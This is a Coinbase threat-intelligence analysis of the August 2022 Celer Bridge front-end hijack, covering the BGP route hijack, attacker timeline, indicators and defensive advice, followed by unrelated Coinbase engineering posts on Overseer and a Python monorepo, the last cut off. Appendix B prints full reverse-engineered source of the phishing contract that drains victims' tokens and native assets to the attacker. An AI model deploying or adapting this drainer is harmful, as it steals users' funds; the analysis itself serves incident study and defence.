Celer Bridge incident analysis

September 9, 2022 Coinbase

coinbase

Tl;dr: In this piece we share critical lessons about the nature of the Celer Bridge compromise, attacker on-chain and off-chain techniques and tactics during the incident, as well as security tips for similar projects and users. Building a better crypto ecosystem means building a better, more equitable future for us all. That’s why we are investing in the larger community to make sure anyone who wants to participate in the cryptoeconomy can do so in a secure way.

While the Celer bridge compromise does not directly affect Coinbase, we strongly believe that attacks on any crypto business are bad for the industry as a whole and hope the information in the blog will help strengthen and inform similar projects and their users about threats and techniques used by malicious actors.

By: Peter Kacherginsky, Threat Intelligence

On August 17, 2022, Celer Network Bridge dapp users were targeted in a front-end hijacking attack which lasted approximately 3 hours and resulted in 32 impacted victims and $235,000 USD in losses. The attack was the result of a Border Gateway Protocol (BGP) announcement that appeared to originate from the QuickHostUk (AS-209243) hosting provider which itself may be a victim. BGP hijacking is a unique attack vector exploiting weakness and trust relationships in the Internet’s core routing architecture. It was used earlier this year to target other cryptocurrency projects such as KLAYswap.

Unlike the Nomad Bridge compromise on August 1, 2022, front-end hijacking primarily targeted users of the Celer platform dapp as opposed to the project’s liquidity pools. In this case, Celer UI users with assets on Ethereum, BSC, Polygon, Optimism, Fantom, Arbitrum, Avalanche, Metis, Astar, and Aurora networks were presented with specially crafted smart contracts designed to steal their funds.

Impact

Ethereum users suffered the largest monetary losses with a single victim losing $156K USD. The largest number of victims on a single network were using BSC, while users of other chains like Avalanche and Metis suffered no losses.

Compromise Analysis

The attacker performed initial preparation on August 12, 2022 by deploying a series of malicious smart contracts on Ethereum, Binance Smart Chain (BSC), Polygon, Optimism, Fantom, Arbitrum, Avalanche, Metis, Astar, and Aurora networks. Preparation for the BGP route hijacking took place on August 16th, 2022 and culminated with the attack on August 17, 2022 by taking over a subdomain responsible for serving dapp users with the latest bridge contract addresses and lasted for approximately 3 hours. The attack stopped shortly after the announcement by the Celer team, at which point the attacker started moving funds to Tornado Cash.

The following sections explore each of the attack stages in more detail as well as the Incident Timeline which follows the attacker over the 7 day period.

BGP Hijacking Analysis

The attack targeted the cbridge-prod2.celer.network subdomain which hosted critical smart contract configuration data for the Celer Bridge user interface (UI). Prior to the attack cbridge-prod2.celer.network (44.235.216.69) was served by AS-16509 (Amazon) with a 44.224.0.0/11 route.

On August 16, 2022 17:21:13 UTC, a malicious actor created routing registry entries for MAINT-QUICKHOSTUK and added a 44.235.216.0/24 route to the Internet Routing Registry (IRR) in preparation for the attack:

Figure 1 — Pre-attack router configuration (source: Misaka NRTM log by Siyuan Miao)

Starting on August 17, 2022 19:39:50 UTC a new route started propagating for the more specific 44.235.216.0/24 route with a different origin AS-14618 (Amazon) than before, and a new upstream AS-209243 (QuickHostUk):

Figure 2 — Malicious route announcement (source: RIPE Raw Data Archive)

Since 44.235.216.0/24 is a more specific path than 44.224.0.0/11 traffic destined for cbridge-prod2.celer.network started flowing through the AS-209243 (QuickHostUk) which replaced key smart contract parameters described in the Malicious Dapp Analysis section below.

Figure 3 — Network map after BGP hijacking (source: RIPE)

In order to intercept rerouted traffic, the attacker created a valid certificate for the target domain first observed at 2022–08–17 19:42 UTC using GoGetSSL, an SSL certificate provider based in Latvia. [1] [2]

Figure 4 -Malicious certificate (source: Censys)

Prior to the attack, Celer used SSL certificates issued by Let’s Encrypt and Amazon for its domains.

On August 17, 2022 20:22:12 UTC the malicious route was withdrawn by multiple Autonomous Systems (ASs):

Figure 5 — Malicious route withdrawal (source: RIPE Raw Data Archive)

Shortly after at 23:08:47 UTC Amazon announced 44.235.216.0/24 to reclaim hijacked traffic:

Figure 6 — Amazon claiming hijacked route (source: RIPE Raw Data Archive)

The first set of funds stolen through a phishing contract occurred at 2022–08–17 19:51 UTC on the Fantom network and continued until 2022–08–17 21:49 UTC when the last user lost assets on the BSC network which aligns with the above timeline concerning the project’s network infrastructure.

Malicious Dapp Analysis

The attack targeted a smart contract configuration resource hosted on cbridge-prod2.celer.network such as https://cbridge-prod2.celer.network/v1/getTransferConfigsForAll holding per chain bridge contract addresses. Modifying any of the bridge addresses would result in a victim approving and/or sending assets to a malicious contract. Below is a sample modified entry redirecting Ethereum users to use a malicious contract 0x2A2a…18E8.

Figure 7 — Sample Celer Bridge configuration (source: Coinbase TI analysis)

See Appendix A for a comprehensive listing of malicious contracts created by attackers.

Phishing Contract Analysis

The phishing contract closely resembles the official Celer Bridge contract by mimicking many of its attributes. For any method not explicitly defined in the phishing contract, it implements a proxy structure which forwards calls to the legitimate Celer Bridge contract. The proxied contract is unique to each chain and is configured on initialization. The command below illustrates the contents of the storage slot responsible for the phishing contract’s proxy configuration:

Figure 8 — Phishing smart contract proxy storage (source: Coinbase TI analysis)

The phishing contract steals users’ funds using two approaches:

Any tokens approved by phishing victims are drained using a custom method with a 4byte value 0x9c307de6()
The phishing contract overrides the following methods designed to immediately steal a victim’s tokens:
send()- used to steal tokens (e.g. USDC)
sendNative() — used to steal native assets (e.g. ETH)
addLiquidity()- used to steal tokens (e.g. USDC)
addNativeLiquidity() — used to steal native assets (e.g. ETH)

Below is a sample reverse engineered snippet which redirects assets to the attacker wallet:

Figure 9 — Phishing smart contract snippet (source: Coinbase TI analysis)

See Appendix B for the complete reverse engineered source code.

Swapping and Obfuscating Funds

During and immediately following the attack:

The attacker swapped stolen tokens on Curve, Uniswap, TraderJoe, AuroraSwap, and other chain-specific DEXs into each chain’s native assets or wrapped ETH.
The attacker bridged all assets from Step 1 to Ethereum.
The attacker then proceeded to swap the remaining tokens on Uniswap to ETH.
Finally, the attacker sent 127 ETH at 2022–08–17 22:33 UTC and another 1.4 ETH at 2022–08–18 01:01 UTC to Tornado Cash.

Following the steps outlined above, the attacker deposited the remaining 0.01201403570756 ETH to 0x6614…fcd9 which previously received funds from and fed into Binance through 0xd85f…4ed8.

The diagram below illustrates the multi-chain bridging and swapping flow used by the attacker prior to sending assets to Tornado Cash:

Figure 10 — Asset swapping and obfuscation diagram (source: Coinbase TI)

Interestingly, following the last theft transaction on 2022–08–17 21:49 UTC from a victim on BSC, there was another transfer on 2022–08–18 02:37 UTC by 0xe35c…aa9d on BSC more than 4 hours later. This address was funded minutes prior to this transaction by 0x975d…d94b using ChangeNow.

Attacker Profile

The attacker was well prepared and methodical in how they constructed phishing contracts. For each chain and deployment, the attacker painstakingly tested their contracts with previously transferred sample tokens. This allowed them to catch multiple deployment bugs prior to the attack.

The attacker was very familiar with available bridging protocols and DEXs, even on more esoteric chains like Aurora shown by their rapid exchange, bridging, and steps to obfuscate stolen assets after they were discovered. Notably, the threat actor chose to target less popular chains like Metis, Astar, and Aurora while going to great lengths to send test funds through multiple bridges.

Transactions across chains and stages of the attack were serialized, indicating a single operator was likely behind the attack.

Performing a BGP hijacking attack requires a specialized networking skill set which the attacker may have deployed in the past.

Protecting Yourself

Web3 projects do not exist in a vacuum and still depend on the traditional web2 infrastructure for many of their critical components such as dapps hosting services and domain registrars, blockchain gateways, and the core Internet routing infrastructure. This dependency introduces more traditional threats such as BGP and DNS hijacking, domain registrar takeover, traditional web exploitation, etc. to otherwise decentralized products. Below are several steps which may be used to mitigate threats in appropriate cases:

Enable the following security controls, or consider using hosting providers that have enabled them, to protect projects infrastructure:

RPKI to protect hosting routing infrastructure.
DNSSEC and CAA to protect domain and certificate services.
Multifactor authentication or enhanced account protection on hosting, domain registrar, and other services.
Limit, restrict, implement logging and review on access to the above services.

Implement the following monitoring both for the project and its dependencies:

Implement BGP monitoring to detect unexpected changes to routes and prefixes (e.g. BGPAlerter)
Implement DNS monitoring to detect unexpected record changes ( e.g. DNSCheck)
Implement certificate transparency log monitoring to detect unknown certificates associated with project’s domain (e.g. Certstream)
Implement dapp monitoring to detect unexpected smart contract addresses presented by the front-end architecture

DeFi users can protect themselves from front-end hijacking attacks by adopting the following practices:

Verify smart contract addresses presented by a Dapp with the project’s official documentation when available.
Exercise vigilance when signing or approving transactions.
Use a hardware wallet or other cold storage solution to protect assets you don’t regularly use.
Periodically review and revoke any contract approvals you don’t actively need.
Follow project’s social media feeds for any security announcements.
Use wallet software capable of blocking malicious threats (e.g. Coinbase Wallet).

Coinbase is committed to improving our security and the wider industry’s security, as well as protecting our users. We believe that exploits like these can be mitigated and ultimately prevented. Besides making codebases open source for the public to review, we recommend frequent protocol audits, implementation of bug bounty programs, and partnering with security researchers. Although this exploit was a difficult learning experience for those affected, we believe that understanding how the exploit occurred can only help further mature our industry.

We understand that trust is built on dependable security — which is why we make protecting your account & your digital assets our number one priority. Learn more here.

Incident Timeline

Stage 1: Preparation

Funding

2022–08–12 14:33 UTC — 0xb0f5…30dd funded from Tornado Cash on Ethereum.

Bridging to BSC, Polygon, Optimism, Fantom, Arbitrum, and Avalanche

2022–08–12 14:41 UTC — 0xb0f5…30dd begins moving funds to BSC, Polygon, Optimism, Fantom, and Arbitrum, Avalanche using ChainHop on Ethereum.

BSC deployment

2022–08–12 14:56 UTC — 0xb0f5…30dd deploys 0x9c8…ec9f9 phishing contract on BSC.

NOTE: Attacker forgot to specify Celer proxy contract.

2022–08–12 17:30 UTC — 0xb0f5…30dd deploys 0x5895…e7cf phishing contract on BSC and tests token retrieval.

Fantom deployment

2022–08–12 18:29 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Fantom.

NOTE: Attacker specified the wrong Celer proxy from the BSC network.

2022–08–12 18:30 UTC — 0xb0f5…30dd deploys 0x458f…f972 phishing contract on Fantom and tests token retrieval.

Bridging to Astar and Aurora

2022–08–12 18:36 UTC — 0xb0f5…30dd moves funds to Astar and Aurora using using Celer Bridge on BSC.

Astar deployment

2022–08–12 18:41 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Astar.

Polygon deployment

2022–08–12 18:57 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Polygon

Optimism deployment

2022–08–12 19:07 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Optimism and tests token retrieval.

Bridging to Metis

2022–08–12 19:12 UTC — 0xb0f5…30dd continues moving funds to Metis using Celer Bridge on Ethereum.

Arbitrum deployment

2022–08–12 19:20 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Arbitrum and tests token retrieval.

Metis deployment

2022–08–12 19:24 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Arbitrum and tests token retrieval.

Avalanche deployment

2022–08–12 19:28 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Avalanche and tests token retrieval.

Aurora deployment

2022–08–12 19:40 UTC — 0xb0f5…30dd deploys 0x9c8…c9f9 phishing contract on Aurora.

Ethereum deployment

2022–08–12 19:50 UTC — 0xb0f5…30dd deploys 0x2a2a…18e8 phishing contract on Ethereum and test token retrieval.

Routing Infrastructure configuration

2022–08–16 17:21 UTC — Attacker updates IRR with AS209243, AS16509 members.

2022–08–16 17:36 UTC — Attacker updates IRR to handle 44.235.216.0/24 route.

Stage 2: Attack

2022–08–17 19:39 UTC — BGP Hijacking of 44.235.216.0/24 route.

2022–08–17 19:42 UTC — New SSL certificates observed for cbridge-prod2.celer.network [1] [2]

2022–08–17 19:51 UTC — First victim observed on Fantom.

2022–08–17 21:49 UTC — Last victim observed on BSC.

2021–08–17 21:56 UTC — Celer Twitter shares reports about a security incident.

2022–08–17 22:12 UTC — BGP Hijacking ends and 44.235.216.0/24 route withdrawn.

Stage 3: Post-Attack Swapping and Obfuscation

2022–08–17 22:33 UTC — Begin depositing 127 ETH to Tornado Cash on Ethereum.

2022–08–17 23:08 UTC — Amazon AS-16509 claims 44.235.216.0/24 route.

2022–08–17 23:45 UTC — The last bridging transaction to Ethereum from Optimism.

2022–08–17 23:53 UTC — The last bridging transaction to Ethereum from Arbitrum.

2022–08–17 23:48 UTC — The last bridging transaction to Ethereum from Polygon.

2022–08–18 00:01 UTC — The last bridging transaction to Ethereum from Avalanche.

2022–08–18 00:17 UTC — The last bridging transaction to Ethereum from Aurora.

2022–08–18 00:21 UTC — The last bridging transaction to Ethereum from Fantom.

2022–08–18 00:26 UTC — The last bridging transaction to Ethereum from BSC.

2022–08–18 01:01 UTC — Begin depositing 1.4 ETH to Tornado Cash on Ethereum.

2022–08–18 01:33 UTC — Transfer 0.01201403570756 ETH to 0x6614…fcd9.

Indicators

Ethereum: 0xb0f5fa0cd2726844526e3f70e76f54c6d91530dd

Ethereum: 0x2A2aA50450811Ae589847D670cB913dF763318E8

Ethereum: 0x66140a95d189846e74243a75b14fe6128dbbfcd9

BSC: 0x5895da888Cbf3656D8f51E5Df9FD26E8E131e7CF

Fantom: 0x458f4d7ef4fb1a0e56b36bf7a403df830cfdf972

Polygon: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Avalanche: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Arbitrum: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Astar: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Aurora: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Optimism: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Metis: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

AS: 209243 (AS number observed in the path on routing announcements and as a maintainer for the prefix in IRR changes)

Appendix A: Phishing smart contracts

Ethereum

0x2a2aa50450811ae589847d670cb913df763318e8

BSC

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

0x11f8c7cdf73b71cd189bb2a7f285dabfe8957f9c

0xc8dd7eadef50a659c480c6fa18863e354e12fc4f

0x5895da888cbf3656d8f51e5df9fd26e8e131e7cf

Polygon

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Fantom

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

0x458f4d7ef4fb1a0e56b36bf7a403df830cfdf972

Arbitrum

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Avalanche

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Astar

0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Aurora

2f0d43ba23b96b878f1c1f75edc2beec9f9

Metis

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Appendix B: Phishing smart contract source code (RE)

The following reverse engineered contract is based on the bytecode at 0x2a2a…18e8

pragma solidity ^0.8.0;

import "./IERC20.sol";

contract CelerPhish {
    address attacker;
    address celerBridge;

constructor(address _celerBridge) public {
        attacker = msg.sender;
        celerBridge = _celerBridge;
    }

function sendNative(address _receiver, uint256 _amount, uint64 _dstChainId, uint64 _nonce, uint32 _maxSlippage) public payable { 
        require(msg.data.length - 4 >= 160);
        if (msg.value > 0) {
            (bool success, ) = attacker.call{value: msg.value}("");
            require(success);
        }
    }

function addLiquidity(address _token, uint256 _amount) public { 
        steal(msg.sender, _token);
    }

function addNativeLiquidity(uint256 _amount) public payable { 
        require(msg.data.length - 4 >= 32);
        if (msg.value > 0) {
            (bool success, ) = attacker.call{value: msg.value}("");
            require(success);
        }
    }

// Steals approved funds, originally 0x9c307de6 4byte
    function stealApprovedTokens(address token, address recipient) public { 
        require(msg.data.length - 4 >= 64);
        steal(recipient, token);
    }

function send(address _reciever, address _token, uint256 _amount, uint64 _dstChainId, uint64 _nonce, uint32 _maxSlippage) public { 
        require(msg.data.length - 4 >= 192);
        steal(msg.sender, _token);
    }

// Steals assets
    function steal(address recipient, address token) private {

uint256 balance = IERC20(token).balanceOf(recipient);
        uint256 allowance = IERC20(token).allowance(recipient, address(this));

if (balance > 0 && allowance > 0) {
            if (balance >= allowance) {
                bool success = IERC20(token).transferFrom(recipient, attacker, allowance);
                require(success);
            } else {
                bool success = IERC20(token).transferFrom(recipient, attacker, balance);
                require(success);
            }
        }
    }

// Forward other calls to the Celer Bridge
    // EIP-1822: https://eips.ethereum.org/EIPS/eip-1822
    fallback() external payable {
        assembly { // solium-disable-line
            let contractLogic := sload(1)
            calldatacopy(0x0, 0x0, calldatasize())
            let success := delegatecall(sub(gas(), 10000), contractLogic, 0x0, calldatasize(), 0, 0)
            let retSz := returndatasize()
            returndatacopy(0, 0, retSz)
            switch success
            case 0 {
                revert(0, retSz)
            }
            default {
                return(0, retSz)
            }
        }
    }
}

References

Celer Bridge incident analysis was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Real-time reconciliation with Overseer

September 6, 2022 Coinbase

Tl;dr: A common challenge with distributed systems is how to ensure that state remains synchronized across systems. At Coinbase, this is an important problem for us as many transactions flow through our microservices every day and we need to ensure that these systems agree on a given transaction. In this blog post, we’ll deep-dive into Overseer, the system Coinbase created to provide us with the ability to perform real-time reconciliation.

By Cedric Cordenier, Senior Software Engineer

Every day, transactions are processed by Coinbase’s payments infrastructure. Processing each of these transactions successfully means completing a complex workflow involving multiple microservices. These microservices range from “front-office” services, such as the product frontend and backend, to “back-office” services such as our internal ledger, to the systems responsible for interacting with our banking partners or executing the transaction on chain.

All of the systems involved in processing a transaction store some state relating to it, and we need to ensure that they agree on what happened to the transaction. To solve this coordination problem, we use orchestration engines like Cadence and techniques such as retries and idempotency to ensure that the transactions are eventually executed correctly.

Despite this effort, the systems occasionally disagree on what happened, preventing the transaction from completing. The causes of this blockage are varied, ranging from bugs to outages affecting the systems involved in processing. Historically, unblocking these transactions has involved significant operational toil, and our infrastructure to tackle this problem has been imperfect.

In particular, our systems have lacked an exhaustive and immutable record of all of the actions taken when processing a transaction, including actions taken during incident remediation, and been unable to verify the consistency of a transaction holistically across the entire range of systems involved in real time. Our existing process relied on ETL pipelines which meant delays of up to 24 hours to be able to access recent transaction data.

To solve this problem, we created Overseer, a system to perform near real-time reconciliation of distributed systems. Overseer has been designed with the following in mind:

Extensibility: Writing a new check is as simple as writing a function, and adding a new data source is a matter of configuration in the average case. This makes it easy for new teams to onboard checks onto the platform that is Overseer.
Scalability: As of today, our internal metrics show that Overseer is capable of handling more than 30k messages per second.
Accuracy: Overseer travels through time and intelligently delays running a check for a short time to compensate for delays in receiving data, thus reducing the number of false negatives.
Near real-time: Overseer has a time to detect (TTD) of less than 1 minute on average.

Architecture

At a high-level, the architecture of Overseer consists of the three services pictured above:

The ingestion service is how any new data enters Overseer. The service is responsible for receiving update notifications from the databases which Overseer is subscribed, storing the update in S3, and notifying the upstream processors runner service (PRS) of the update.
The data access layer service (DAL) is how services access the data stored in S3. Each update is stored as a single, immutable, object in S3 and the DAL is responsible for aggregating the updates into a canonical view of a record at a given point in time. This also serves as the semantic layer on top of S3 by translating data from its at-rest representation — which makes no assumptions about the schema or format of the data — into protobufs, and by defining the join relationships necessary to stitch multiple related records into a data view.
The processors runner service (PRS) receives these notifications and determines which checks — also known as processors — are applicable to the notification. Before running the check, it calls the data access layer service to fetch the data view required to perform the check.

The Ingestion Service

A predominant design goal of the ingestion service is to support any format of incoming data. As we look to integrate Overseer into all of Coinbase systems in the future, it is crucial that the platform is built to easily and efficiently add new data sources.

Our typical pattern for receiving events from upstream data sources is to tail its database’s WAL (write-ahead log). We chose this approach for a few reasons:

Coinbase has a small number of database technologies that are considered “paved road”, so by supporting the data format emitted by the WAL, we can make it easy to onboard the majority of our services.
Tailing the WAL also ensures a high level of data fidelity as we are replicating directly what’s in the database. This eliminates a class of errors which the alternative — to have upstream data sources emit change events at the application level — would expose us to.

The ingestion service is able to support any data format due to how data is stored and later received. When the ingestion service receives an update, it creates two artifacts — the update document and the master document.

The update document contains the update event exactly as we received it from the upstream source, in its original format (protobuf bytes, JSON, BSON, etc) and adds metadata such as the unique identifier for the record being modified.
The master document aggregates all of the references found in updates belonging to a single database model. Together, these documents serve as an index Overseer can use to join records together.

When the ingestion service receives an update for a record, it extracts these references and either creates a master document with the references (if the event is an insert event), or updates an existing master document with any new references (if the event is an update event). In other words, ingesting a new data format is just a matter of storing the raw event and extracting its metadata, such as the record identifier, or any references it has to other records.

To achieve this, the ingestion service has the concept of a consumer abstraction. Consumers translate a given input format into the two artifacts we mentioned above and can onboard new data sources, through configuration, to tie the data source to a consumer to use at runtime.

However, this is just one part of the equation. The ability to store arbitrary data is only useful if we can later retrieve it and give it some semantic meaning. This is where the Data Access Layer (DAL) is useful.

DAL, Overseer’s semantic layer

To understand the role played by DAL, let’s examine a typical update event from the perspective of a hypothetical Toy model, which has the schema described below:

type Toy struct {
    Type string
    Color string
    Id string
}

We’ll further assume that our Toy model is hosted in a MongoDB collection, such that change events will have the raw format described here. For our example Toy record, we’ve recorded two events, namely an event creating it, and a subsequent update. The first event looks approximately like this, with some irrelevant details or field elided:

{
    "_id": "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
    "fullDocument": {
        "type": "watergun",
        "color": "blue",
     },
     "clusterTime": 1658224073,
}

And, the second, like this:

{
    "_id": "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
    "updateDescription": {
        "updatedFields": {
            "type": "balloon",
        },
     },
     "clusterTime": 1658224074,
}

We mentioned earlier that DAL serves as the semantic layer on top of Overseer’s storage. This means it performs three functions with respect to this data:

Time travel: retrieving the updates belonging to a record up to a given timestamp. In our example, this could mean retrieving either the first or both of these updates.

Aggregation: transforming the updates into a view of the record at a point in time, and serializing this into DAL’s output format, protobufs.

In our case, the updates above can be transformed to describe the record at two points in time, namely after the first update, and after the second update. If we were interested in knowing what the record looked like on creation, we would transform the updates by fetching the first update’s “fullDocument” field. This would result in the following:

proto.Toy{
    Type: "watergun",
    Id: "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
    Color: "blue",
}

However, if we wanted to know what the record would look like after the second update, we would instead take the “fullDocument” of the initial update and apply the contents of the “updateDescription” field of subsequent updates. This would yield:

proto.Toy{
    Type: "balloon",
    Id: "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
    Color: "blue",
}

This example contains two important insights:

First, the algorithm required to aggregate updates depends on the input format of the data. Accordingly, DAL encapsulates the aggregation logic for each type of input data, and has aggregators (called “builders”) for all of the formats we support, such as Mongo or Postgres for example.
Second, aggregating updates is a stateless process. In an earlier version of Overseer, the ingestion service was responsible for generating the latest state of a model in addition to storing the raw update event. This was performant but led to significantly reduced developer velocity, since any errors in our aggregators required a costly backfill to correct.

Exposing data views

Checks running in Overseer operate on arbitrary data views. Depending on the needs of the check being performed, these views can contain a single record or multiple records joined together. In the latter case, DAL provides the ability to identify sibling records by querying the collection of master records built by the ingestion service.

PRS, a platform for running checks

As we mentioned previously, Overseer was designed to be easily extensible, and nowhere is this more important than in the design of the PRS. From the outset, our design goal was to make adding a new check as easy as writing a function, while retaining the flexibility to handle the variety of use cases Overseer was intended to serve.

A check is any function which performs the following two functions:

It makes assertions when given data. A check can declare which data it needs by accepting a data view provided by DAL as a function argument.
It specifies an escalation policy: i.e. given a failing assertion, it makes a decision on how to proceed. This could be as simple as emitting a log, or creating an incident in PagerDuty, or performing any other action decided by the owner of the check.

Keeping checks this simple facilitates onboarding — testing is particularly easy as a check is just a function which accepts some inputs and emits some side effects — but requires PRS to handle a lot of complexity automatically. To understand this complexity, it’s helpful to gain an overview of the lifecycle of an update notification inside Overseer. In the architecture overview at the beginning of this post, we saw how updates are stored by the ingestion service in S3 and how the ingestion service emits a notification to PRS via an events topic. Once a message has been received by PRS, it goes through the following flow:

Selection: PRS determines which checks should be triggered by the given event.
Scheduling: PRS determines when and how a check should be scheduled. This happens via what we call “execution strategies”. These can come in various forms, but basic execution strategies might execute a check immediately (i.e. do nothing), or delay a check by a fixed amount of time, which can be useful for enforcing SLAs. The default execution strategy is more complex. It drives down the rate of false negatives by determining the relative freshness of the data sources that Overseer listens to, and may choose to delay a check — thus sacrificing a little bit of our TTD — to allow lagging sources to catch up.
Translation maps the event received to a specific data view required by the check. During this step, PRS queries the DAL to fetch the records needed to perform the check.
Finally, execution, which calls the check code.

Checks are registered with the framework through a lightweight domain-specific language (DSL). This DSL makes it possible to register a check in a single line of code, with sensible defaults specifying the behavior in terms of what should trigger a check (the selection stage), how to schedule a check, and what view it requires (the translation stage). For more advanced use cases, the DSL also acts as an escape hatch by allowing users to customize the behavior of their check at each of these stages.

Today, Overseer processes more than 30,000 messages per second, and supports four separate use cases in production, with a goal to add two more by the end of Q3. This is a significant milestone for the project which has been in incubation for more than a year, and required overcoming a number of technical challenges, and multiple changes to Overseer’s architecture.

This project has been a true team effort, and would not have been possible without the help and support of the Financial Hub product and engineering leadership, and members of the Financial Hub Transfers and Transaction Intelligence teams.

Real-time reconciliation with Overseer was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Building a Python ecosystem for efficient and reliable development

September 1, 2022 Coinbase

Tl;dr: This blog post describes how we developed an efficient, reliable Python ecosystem using Pants, an open source build system, and solved the challenge of managing Python applications at a large scale at Coinbase.

By The Coinbase Compute Platform Team

Python is one of the most frequently used programming languages for data scientists, machine learning practitioners, and blockchain researchers at Coinbase. Over the past few years, we have witnessed a growth of Python applications that aim to solve many challenging problems in the cryptocurrency world like Airflow data pipelines, blockchain analytics tools, machine learning applications, and many others. Based on our internal data, the number of Python applications has almost doubled since Q3, 2022. According to our internal data, today there are approximately 1,500 data processing pipelines and services developed with Python. The total number of builds is around 500 per week at the time of writing. We foresee an even wider application as more Python centric frameworks (such as Ray, Modin, DASK, etc.) are adopted into our data ecosystem.

Choosing the right tool

Engineering success comes largely from choosing the right tools. Building a large-scale Python ecosystem to support our growing engineering requirements could raise some challenges, including using a reliable build system, flexible dependency management, fast software release, and consistent code quality check. However, these challenges can be combated by integrating Pants, a build system developed by Toolchain labs, into the Coinbase build infrastructure. We chose this as the Python build system for the following reasons:

Pants is ergonomic and user-friendly,
Pants understands many build-related commands, such as “test”, “lint”, “fmt”, “typecheck”, and “package”
Pants was designed with real-world Python use as a first-class use-case, including handling third party dependencies. In fact, parts of Pants itself is written in Python (with the rest written in Rust).
Pants requires less metadata and BUILD file boilerplate than other tools, thanks to the dependency inference, sensible defaults and auto-generation of BUILD files. Bazel requires a huge amount of handwritten BUILD boilerplate.
Pants is easy to extend, with a powerful plugin API that uses idiomatic Python 3 async code, so that users can have a natural control flow in their plugins.
Pants has true OSS governance, where any org can play an equal role.
Pants has a gentle learning curve. It has much less friction than other tools. The maintenance cost is moderate thanks to the one-click installation experience of the tool and simple configuration files.

Previous problems

Python is one of the most popular programming languages for machine learning and data science applications. However, prior to adopting the Python-first build system, Pants, our internal investment in the Python ecosystem was low in comparison to that of Golang and Ruby — the primary choice for writing services and web applications at Coinbase.

According to the usage statistics of Coinbase’s monorepo, Python today accounts for only 4% of the usage because of lack of build system support. Before 2021, most of the Python projects were in multiple repositories without a unified build infrastructure — leading to the following issues:

Challenges with code sharing: The process for an engineer to update a shared library was complex. Changes made to the code were published to an internal PyPI server before being proven to be more stable. A library that was upgraded to a new version, but had not undergone enough testing, could potentially break the dependee that consumed the library without a pinned version.
Lack of streamlined release process: Code change often required complicated cross-repository updates and releases. There was no automatic workflow to carry out the integration and staging tests for the relevant changes. The lack of coherent observability and reliability imposed a tremendous engineering overhead.
Inconsistent development experiences: Development experience varied a lot as each repository had its own way of virtual environment setup, code quality check, build and deployment etc.

Building PyNest for data organization

We decided to build PyNest — a new Python “monorepo” for the data organization at Coinbase. It is not our intention for PyNest to be use as a monorepo for the entire company, but rather that the repository is used for projects within the data organization.

Building a company-wide monorepo requires a team of elites. We do not have enough crew to reproduce the success stories of monorepos at Facebook, Twitter, and Google.
Python is primarily used within the data org in the company. It is important to set the right scope so that we can focus on data priorities without being distracted by ad hoc requirements. The PyNest build infrastructure can be reused by other teams to expedite their Python repositories.
It is desirable to consolidate mutually dependent projects (see the dependency graph for ML platform projects) into a single repository to prevent inadvertent cyclic dependencies.

Figure 1. Dependency graph for machine learning platform (MLP) projects.

Although monorepo promised a new world of productivity, it has been proven not to be a long term solution for Coinbase. The Golang monorepo is a lesson, where problems emerged after a year of usage such as sprawling codebase, failed IDE integrations, slow CI/CD, out-of-date dependencies, etc.
Open source projects should be kept in individual repositories.

The graph below shows the repository architecture at Coinbase, where the green blocks indicate the new Python ecosystem we have built. Inter-repository operability is achieved by serving layers including the code artifacts and schema registry.

Figure 2. Repository architecture at Coinbase

PyNest repository structure

# third-party dependencies

# third-party dependencies

├── 3rdparty

│   ├── dependency1

│   │   ├── BUILD

│   │   ├── requirements.txt

│   │   └── resolve1.lock # lockfile

│   │

│   └── dependency2

│   │   ├── BUILD

│   │   ├── requirements.txt

│   │   └── resolve2.lock

...

│

# shared libraries

├── lib

│

# top level project folders

├── project1 # project name

│    ├── src

│    │    └── python

│    │         ├── databricks

│    │         │    ├── BUILD

│    │         │    ├── OWNERS

│    │         │    ├── gateway.py

│    │         │    ...

│    │         └── notebook

│    │              ├── BUILD

│    │              ├── OWNERS

│    │              ├── etl_job.py

│    │              ...

│    └── test

│         └── python

│              ├── databricks

│              │    ├── BUILD

│              │    ├── gateway_test.py

│              │    ...

│              └── notebook

│                   ├── BUILD

│                   ├── etl_job_test.py

│                   ...

├── project2

...

│

# Docker files

├── dockerfiles

│

# tools for lint, formatting, etc.

├── tools

│

# Buildkite CI workflow

├── .buildkite

│    ├── pipeline.yml

│    └── hooks

│

# Pants library

├── pants

├── pants.toml

└── pants.ci.toml

Figure 3. Pynest repository structure

The following is a list of the major elements of the repository and their explanations.

1. 3rdparty

Third party dependencies are placed under this folder. Pants will parse the requirements.txt files and automatically generate the “python_requirement” target for each of the dependencies. Multiple versions of the same dependency are supported by the multiple lockfiles feature of Pants. This feature makes it possible for projects to have conflicts in either direct or transitive dependencies. Pants generates lockfiles to pin every dependency and ensure a reproducible build. More explanations of the pants multiple lock is in the dependency management section.

2. Lib

Shared libraries accessible to all the projects. Projects within PyNest can directly import the source code. For projects outside PyNest, the libraries can be accessed via pip installing the wheel files from an internal PyPI server.

3. Project folders

